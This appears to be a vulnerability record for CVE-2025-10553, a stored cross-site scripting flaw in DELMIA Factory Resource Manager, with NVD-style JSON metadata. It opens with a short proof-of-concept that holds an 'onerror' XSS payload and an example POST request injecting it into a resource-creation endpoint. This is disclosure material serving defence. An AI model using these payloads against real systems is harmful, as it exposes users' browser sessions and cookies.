CVE-2025-10553

<!-- // Proof of Concept (PoC) for CVE-2025-10553 // Description: Stored XSS in Factory Resource Management field --> <script> // Malicious payload to be injected into a vulnerable field (e.g., Resource Name or Description) // This payload demonstrates stealing the document cookie var payload = '<img src=x onerror=alert(document.cookie)>'; // Simulation of the injection request // In a real scenario, an attacker would send a POST request to the vulnerable endpoint // Example Request: // POST /api/factory/resource/create HTTP/1.1 // Host: target-domain.com // { "name": "Resource1", "description": "<img src=x onerror=alert(1)>" } console.log('Injecting payload: ' + payload); alert('If this alert appears when viewing the resource list, the vulnerability is confirmed.'); </script>

{"cve": {"id": "CVE-2025-10553", "sourceIdentifier": "[email protected]", "published": "2026-03-31T09:16:21.823", "lastModified": "2026-04-06T15:17:33.930", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross-site Scripting (XSS) vulnerability affecting Factory Resource Management in DELMIA Factory Resource Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) almacenado que afecta a la Gestión de Recursos de Fábrica en DELMIA Factory Resource Manager desde la versión 3DEXPERIENCE R2023x hasta la versión 3DEXPERIENCE R2025x permite a un atacante ejecutar código de script arbitrario en la sesión del navegador del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:3ds:3dexperience:*:*:*:*:*:*:*:*", "versionStartIncluding": "r2023x", "versionEndIncluding": "r2025x", "matchCriteriaId": "5D800681-01F0-43E4-9525-BE188167D292"}]}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10553", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}